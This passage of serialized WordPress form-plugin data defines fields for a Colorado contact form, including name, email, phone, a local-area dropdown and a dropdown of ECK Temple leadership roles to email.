Name\";s:9:\"field_key\";s:11:\"lastname_22\";s:21:\"custom_name_attribute\";s:5:\"lname\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:68;}i:3;a:2:{s:8:\"settings\";a:48:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:4;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:5:\"email\";s:6:\"def_id\";s:2:\"14\";s:5:\"label\";s:5:\"Email\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";s:9:\"last_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:14:\"user_address_1\";s:1:\"0\";s:14:\"user_address_2\";s:1:\"0\";s:9:\"user_city\";s:1:\"0\";s:8:\"user_zip\";s:1:\"0\";s:10:\"user_phone\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:8:\"email_23\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:14:\"one-half first\";s:11:\"field_label\";s:5:\"Email\";s:9:\"field_key\";s:8:\"email_23\";s:21:\"custom_name_attribute\";s:5:\"email\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:69;}i:4;a:2:{s:8:\"settings\";a:50:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:5;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:5:\"phone\";s:6:\"def_id\";s:2:\"15\";s:5:\"label\";s:5:\"Phone\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:14:\"(999) 999-9999\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";s:9:\"last_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:14:\"user_address_1\";s:1:\"0\";s:14:\"user_address_2\";s:1:\"0\";s:9:\"user_city\";s:1:\"0\";s:8:\"user_zip\";s:1:\"0\";s:10:\"user_email\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:8:\"phone_24\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:8:\"one-half\";s:10:\"manual_key\";s:0:\"\";s:11:\"custom_mask\";s:0:\"\";s:11:\"field_label\";s:5:\"Phone\";s:9:\"field_key\";s:8:\"phone_24\";s:21:\"custom_name_attribute\";s:5:\"phone\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:70;}i:5;a:2:{s:8:\"settings\";a:30:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:6;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:10:\"listselect\";s:5:\"label\";s:15:\"Your Local Area\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:9:\"list_type\";s:8:\"dropdown\";s:10:\"multi_size\";s:1:\"5\";s:15:\"list_show_value\";s:1:\"1\";s:4:\"list\";a:0:{}s:21:\"user_info_field_group\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:10:\"user_state\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:7:\"options\";a:7:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Boulder\";s:5:\"value\";s:7:\"Boulder\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"Co Springs\";s:5:\"value\";s:10:\"Co Springs\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:6:\"Denver\";s:5:\"value\";s:6:\"Denver\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:4;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Loveland\";s:5:\"value\";s:8:\"Loveland\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:5;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Western Slope\";s:5:\"value\";s:13:\"Western Slope\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:6;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:8:\"selected\";s:1:\"0\";s:5:\"label\";s:5:\"Other\";s:5:\"value\";s:5:\"Other\";s:4:\"calc\";s:0:\"\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}s:3:\"key\";s:13:\"listselect_25\";s:15:\"container_class\";s:0:\"\";s:11:\"field_label\";s:15:\"Your Local Area\";s:9:\"field_key\";s:13:\"listselect_25\";}s:2:\"id\";i:71;}i:6;a:2:{s:8:\"settings\";a:16:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:7;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:2:\"hr\";s:5:\"label\";s:2:\"hr\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:5:\"hr_26\";s:15:\"container_class\";s:0:\"\";s:11:\"field_label\";s:2:\"hr\";s:9:\"field_key\";s:5:\"hr_26\";}s:2:\"id\";i:72;}i:7;a:2:{s:8:\"settings\";a:19:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:8;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:4:\"html\";s:5:\"label\";s:29:\"Colorado Leadership Positions\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:13:\"default_value\";s:188:\"<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Colorado Leadership Positions</span></span></span></strong></span></h3>\";s:7:\"desc_el\";s:3:\"div\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:7:\"default\";s:188:\"<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Colorado Leadership Positions</span></span></span></strong></span></h3>\";s:3:\"key\";s:7:\"html_27\";s:15:\"container_class\";s:0:\"\";s:11:\"field_label\";s:29:\"Colorado Leadership Positions\";s:9:\"field_key\";s:7:\"html_27\";}s:2:\"id\";i:73;}i:8;a:2:{s:8:\"settings\";a:31:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:9;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:10:\"listselect\";s:5:\"label\";s:41:\"Select the person you would like to email\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:9:\"list_type\";s:8:\"dropdown\";s:10:\"multi_size\";s:1:\"5\";s:15:\"list_show_value\";s:1:\"1\";s:4:\"list\";a:0:{}s:21:\"user_info_field_group\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:10:\"user_state\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:7:\"options\";a:5:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:19:\"ECK Temple Director\";s:5:\"value\";s:19:\"eck-temple-director\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:24:\"ECK Temple Vahana Leader\";s:5:\"value\";s:24:\"ECK Temple Vahana Leader\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:27:\"Spiritual Services Director\";s:5:\"value\";s:27:\"Spiritual Services Director\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:4;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:23:\"Administrative Services\";s:5:\"value\";s:23:\"Administrative Services\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> 